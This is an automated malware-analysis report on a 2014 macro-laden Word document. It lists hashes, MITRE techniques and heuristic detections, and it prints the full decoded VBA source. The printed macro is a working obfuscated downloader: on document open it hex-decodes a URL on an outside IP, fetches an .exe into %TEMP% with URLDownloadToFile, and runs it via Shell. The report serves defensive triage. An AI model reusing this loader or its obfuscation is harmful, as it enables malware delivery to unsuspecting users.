Office (OLE) malware analysis — malicious · 27d465eb58e46936

MALICIOUS

Office (OLE)

39.5 KB Created: 2014-11-24 10:39:00 Authoring application: Microsoft Office Word First seen: 2015-02-05

MD5: 7f3c2b0c5abe311f4e40b2a938a8ed75 SHA-1: de424630248406ab3380dc6af0e1307b3ede5396 SHA-256: 27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d

406 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, triggered upon opening the document, utilizes the URLDownloadToFile API to download a second-stage payload. This is a common technique for delivering malware.

Heuristics 12

ClamAV: Doc.Downloader.Macr-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macr-2
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    pHUdsfd = Shell(oGYUIgiu, 1)
```
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA
Matched line in script
```
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
    pHUdsfd = Shell(oGYUIgiu, 1)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6836 bytes
SHA-256: `0989b5737d60c5362a09c1c9ecccb1db3dfcbe74de792447a7d11306abebb666`
Detection ClamAV: No threats found Obfuscation or payload: likely 65 of 115 identifiers look randomly generated (e.g. 'UJeTKZjRRErSpBP') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal dsfdsfdsf As LongPtr, _ ByVal rtyeffg As String, _ ByVal fdger As String, _ ByVal reteruywer As Long, _ ByVal werwedsf As LongPtr) As LongPtr #Else Private Declare Function URLDownloadToFile Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal dsfdsfdsf As Long, _ ByVal rtyeffg As String, _ ByVal fdger As String, _ ByVal reteruywer As Long, _ ByVal werwedsf As Long) As Long #End If Sub werwehytef() Dim QOBXhmAl As Integer For QOBXhmAl = 0 To 3 Dim kXJALATO As Integer For kXJALATO = 0 To 5 Dim DwptkYLg As Integer For DwptkYLg = 0 To 9 DoEvents Next DwptkYLg DoEvents Next kXJALATO Dim tlwoFgep As Integer For tlwoFgep = 0 To 3 DoEvents Next tlwoFgep DoEvents Next QOBXhmAl Dim vtRZaliF As Integer For vtRZaliF = 0 To 6 Dim pHKvosSI As Integer For pHKvosSI = 0 To 4 DoEvents Next pHKvosSI DoEvents Next vtRZaliF Dim flWdzivJ As Integer For flWdzivJ = 0 To 7 DoEvents Next flWdzivJ sdfsdwee End Sub Sub AutoOpen() Dim VpUsliln As Integer For VpUsliln = 0 To 2 Dim SAYlUiXp As Integer For SAYlUiXp = 0 To 6 Dim XlKwlndr As Integer For XlKwlndr = 0 To 5 DoEvents Next XlKwlndr DoEvents Next SAYlUiXp Dim NWWpsxNd As Integer For NWWpsxNd = 0 To 8 DoEvents Next NWWpsxNd DoEvents Next VpUsliln Dim HrOinrOl As Integer For HrOinrOl = 0 To 6 Dim MRKwlEzM As Integer For MRKwlEzM = 0 To 7 DoEvents Next MRKwlEzM DoEvents Next HrOinrOl Dim VuWpsbFr As Integer For VuWpsbFr = 0 To 8 DoEvents Next VuWpsbFr werwehytef End Sub Sub Workbook_Open() Dim fkNGSJaZ As Integer For fkNGSJaZ = 0 To 1 Dim vofHhwnj As Integer For vofHhwnj = 0 To 6 Dim WZzOiENz As Integer For WZzOiENz = 0 To 1 DoEvents Next WZzOiENz DoEvents Next vofHhwnj Dim UedLuKbT As Integer For UedLuKbT = 0 To 8 DoEvents Next UedLuKbT DoEvents Next fkNGSJaZ Dim vrUjKxcT As Integer For vrUjKxcT = 0 To 6 Dim fkaGOdrn As Integer For fkaGOdrn = 0 To 5 DoEvents Next fkaGOdrn DoEvents Next vrUjKxcT Dim itRnfloL As Integer For itRnfloL = 0 To 3 DoEvents Next itRnfloL werwehytef End Sub Sub sdfsdwee() Dim nKOyHRKO As Integer For nKOyHRKO = 0 To 7 Dim fjaGYIub As Integer For fjaGYIub = 0 To 1 Dim DcXpaUZB As Integer For DcXpaUZB = 0 To 3 DoEvents Next DcXpaUZB DoEvents Next fjaGYIub Dim nVumNXzZ As Integer For nVumNXzZ = 0 To 1 DoEvents Next nVumNXzZ DoEvents Next nKOyHRKO Dim kLrEvRLI As Integer For kLrEvRLI = 0 To 2 Dim KJSNNToS As Integer For KJSNNToS = 0 To 7 DoEvents Next KJSNNToS DoEvents Next kLrEvRLI Dim SRhPEQft As Integer For SRhPEQft = 0 To 5 DoEvents Next SRhPEQft Next SRhPEQft HBBJK = BUHVugrue("6874") hkhnioki = BUHVugrue("74703A2F2F") hojdsfg = BUHVugrue("39352E3136332E3132312E37313A383038302F6D6F7073692F706F7073692E706870") uyVUHjdg = HBBJK + hkhnioki + hojdsfg Dim lGxtiFPa As Integer For lGxtiFPa = 0 To 2 Dim eEwdmMHl As Integer For eEwdmMHl = 0 To 5 Dim QYosYDRG As Integer For QYosYDRG = 0 To 2 DoEvents Next QYosYDRG DoEvents Next eEwdmMHl Dim vulxTzrl As Integer For vulxTzrl = 0 To 9 DoEvents Next vulxTzrl DoEvents Next lGxtiFPa Dim uyvadHZZ As Integer For uyvadHZZ = 0 To 6 Dim MYIgMYac As Integer For MYIgMYac = 0 To 1 DoEvents Next MYIgMYac DoEvents Next uyvadHZZ Dim lSPogoeg As Integer For lSPogoeg = 0 To 6 DoEvents Next lSPogoeg oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865") Dim AFzUlTGV As Integer For AFzUlTGV = 0 To 9 Dim ysVaDJCV As Integer For ysVaDJCV = 0 To 7 Dim lFAFtXdl As Integer For lFAFtXdl = 0 To 2 DoEvents Next lFAFtXdl DoEvents Next ysVaDJCV Dim UtrTsIYm As Integer For UtrTsIYm = 0 To 5 DoEvents Next UtrTsIYm DoEvents Next AFzUlTGV Dim NBASjVzj As Integer For NBASjVzj = 0 To 8 Dim eRlvndEb As Integer For eRlvndEb = 0 To 6 DoEvents Next eRlvndEb DoEvents Next NBASjVzj Dim kWWhUBVb As Integer For kWWhUBVb = 0 To 9 DoEvents Next kWWhUBVb eUUsdgf = URLDownloadToFile(0&, uyVUHjdg, oGYUIgiu, 0&, 0&) Dim pHUdsfd Dim mAYkCQMj As Integer For mAYkCQMj = 0 To 8 Dim TfgSUebU As Integer For TfgSUebU = 0 To 4 Dim lIaKjaFk As Integer For lIaKjaFk = 0 To 2 DoEvents Next lIaKjaFk DoEvents Next TfgSUebU Dim IBADqvaD As Integer For IBADqvaD = 0 To 5 DoEvents Next IBADqvaD DoEvents Next mAYkCQMj Dim lFbXYkVq As Integer For lFbXYkVq = 0 To 2 Dim bzGSzOfn As Integer For bzGSzOfn = 0 To 3 DoEvents Next bzGSzOfn DoEvents Next lFbXYkVq Dim zFnLDitd As Integer For zFnLDitd = 0 To 6 DoEvents Next zFnLDitd pHUdsfd = Shell(oGYUIgiu, 1) End Sub Public Function BUHVugrue(ByVal UJeTKZjRRErSpBP As String) As String For GAqVffe = 1 To Len(UJeTKZjRRErSpBP) Step 2 Dim GCYINvKW As Integer For GCYINvKW = 0 To 9 Dim GBcmygBP As Integer For GBcmygBP = 0 To 4 Dim VBWAuLfD As Integer For VBWAuLfD = 0 To 7 DoEvents Next VBWAuLfD DoEvents Next GBcmygBP Dim hXiYEAvI As Integer For hXiYEAvI = 0 To 2 DoEvents Next hXiYEAvI DoEvents Next GCYINvKW Dim XupwfuAF As Integer For XupwfuAF = 0 To 5 Dim nUCwEhDX As Integer For nUCwEhDX = 0 To 3 DoEvents Next nUCwEhDX DoEvents Next XupwfuAF Dim RpNpxsby As Integer For RpNpxsby = 0 To 4 DoEvents Next RpNpxsby OAEeSPJcZw = Chr(CDbl(Chr(38) & Chr(72) & Mid$(UJeTKZjRRErSpBP, GAqVffe, 2))) Dim DuDiCbga As Integer For DuDiCbga = 0 To 6 Dim KYaocdyh As Integer For KYaocdyh = 0 To 1 Dim WdSgkWrx As Integer For WdSgkWrx = 0 To 1 DoEvents Next WdSgkWrx DoEvents Next KYaocdyh Dim OSNdzeBF As Integer For OSNdzeBF = 0 To 8 DoEvents Next OSNdzeBF DoEvents Next DuDiCbga Dim pRddMWhq As Integer For pRddMWhq = 0 To 2 Dim MxHzzJfz As Integer For MxHzzJfz = 0 To 1 DoEvents Next MxHzzJfz DoEvents Next pRddMWhq Dim UVNdayDT As Integer For UVNdayDT = 0 To 1 DoEvents Next UVNdayDT qwsEHVrtCMHkAS = qwsEHVrtCMHkAS & OAEeSPJcZw Next GAqVffe Dim JOHXGwzq As Integer For JOHXGwzq = 0 To 6 Dim iMLSjCiD As Integer For iMLSjCiD = 0 To 6 Dim ToNdaoAx As Integer For ToNdaoAx = 0 To 8 DoEvents Next ToNdaoAx DoEvents Next iMLSjCiD Dim vCRVRgYG As Integer For vCRVRgYG = 0 To 6 DoEvents Next vCRVRgYG DoEvents Next JOHXGwzq Dim iGddLVrz As Integer For iGddLVrz = 0 To 6 Dim tqkMiOqQ As Integer For tqkMiOqQ = 0 To 3 DoEvents Next tqkMiOqQ DoEvents Next iGddLVrz Dim JQZruVPf As Integer For JQZruVPf = 0 To 1 DoEvents Next JQZruVPf BUHVugrue = qwsEHVrtCMHkAS End Function

Open this report in the interactive analyzer, or submit your own file for analysis.